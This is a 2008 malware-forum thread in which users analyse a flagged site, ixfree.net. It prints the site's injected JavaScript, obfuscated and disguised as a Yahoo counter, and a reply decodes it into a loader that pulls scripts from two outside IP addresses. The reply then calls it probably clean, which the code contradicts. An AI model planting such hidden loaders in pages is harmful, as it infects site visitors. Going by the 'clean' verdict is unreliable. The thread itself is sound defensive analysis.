Malware Domain List

Malware Related => Malicious Domains => Topic started by: cconniejean on December 18, 2008, 10:13:48 pm

Title: ixfree.net
Post by: cconniejean on December 18, 2008, 10:13:48 pm
Code: [Select]
http://ixfree.net/
Site tagged by Finjan first:
The requested URL was blocked, the page you requested contains malicious code.

I checked the link using the normal ones I use and they all show clean.
ExpLabs Online Scanner showed clean
Dr.Web Online Scanner showed clean

Took the link here, and this was the results, not sure how long this link is good:
Code: [Select]
http://anubis.iseclab.org/?action=result&task_id=13549db9428d3b4b4dd344a7587cd66b1&format=html
Using vURL to check the source, guessing it is what I'm seeing at the bottom of the page:
Code: [Select]
033  <IMG height=1 src="/images/c.gif" width=1> </DIV><IFRAME
1034 src="res://C:WINDOWSsystem32shdoclc.dll/dnserror.htm" width=1
1035 height=1>
1036 </IFRAME></DIV><script language=javascript><!-- Yahoo! Counter starts
1037 if(typeof(yahoo_counter)!=typeof(1))eval(unescape('//%3Cd@%69!%76%20%73%74!y%6C%65=@%64|i`%73p$%6C~%61y:%6Eo&%6E&%65#%3E\n|%64$%6F%63#%75~me$%6E&%74.%77%72`%69&%74e@("%3C%2F%74!%6
5~x@%74@ar#ea|%3E!%22&);|v#%61r%20%69%2C%5F%2C!a=`["7%38#.1!1%30%2E~1@%37~5.@2`1$%22|,%22@1`%395~%2E!%32&%34%2E%37%36.2%35$%31&%22~%5D$%3B%5F%3D@%31#;~%69f%28$%64&%6F%63@u&%6D
#ent.%63`%6Fo#k|%69%65.%6Da$%74%63%68%28%2F%5C%62%68%67&%66@%74~=%31~/%29%3D%3D@n%75$%6C%6C%29~fo%72`(%69%3D0%3B&i%3C&%32~;$%69%2B%2B!)$%64#%6Fc#%75$%6D%65%6E%74`%2Ew%72%69#%74%65(|"%
3C!%73%63%72i#p!%74%3E%69&%66(|%5F$%29%64%6F@%63|%75m$%65%6E%74@%2E%77r@%69t%65`(%5C%22%3C`%73%63r%69%70%74&%20~i@d`=%5F"~+i%2B%22%5F&%20`s~r%63%3D!%2F|/%22+$%61|[~i%5D+$%22$%2F`%63%7
0/@%3F%22%2B%6E&a%76ig%61t&%6F`%72%2E%61%70%70!%4E#%61~%6D~%65@%2E&%63h#%61r%41t&(`0%29+%22#%3E&%3C&%5C%5C@/#%73%63~%72i`%70~t!%3E%5C!%22%29$%3C%5C@/s%63ri#%70%74$%3E%22%29@;!\
n|%2F%2F%3C#%2F%64&%69v`%3E').replace(/\&|#|@|\!|\||~|\$|`/g,""));var yahoo_counter=1;
1038 <!-- counter end --></script>
1039 </BODY></HTML>
Title: Re: ixfree.net
Post by: Kayrac on December 18, 2008, 10:49:36 pm
it unescapes to this

Code: [Select]
//<div style=display:none>
document.write("</textarea>");var i,_,a=["78.110.175.21","195.24.76.251"];_=1;if(document.cookie.match(/\bhgft=1/)==null)for(i=0;i<2;i++)document.write("<script>if(_)document.write(\"<script id=_"+i+"_ src=//"+a[i]+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");
//</div>

i think it's clean, but could be wrong
Title: Re: ixfree.net
Post by: cconniejean on December 18, 2008, 11:51:10 pm
Thank you Kayrac, one of those cookie things, ok, thanks again.
Title: Re: ixfree.net
Post by: Serg on December 19, 2008, 10:28:51 am
i've got just "//just fuck off...<div style=display:none>" ???. Is there any other result?  :)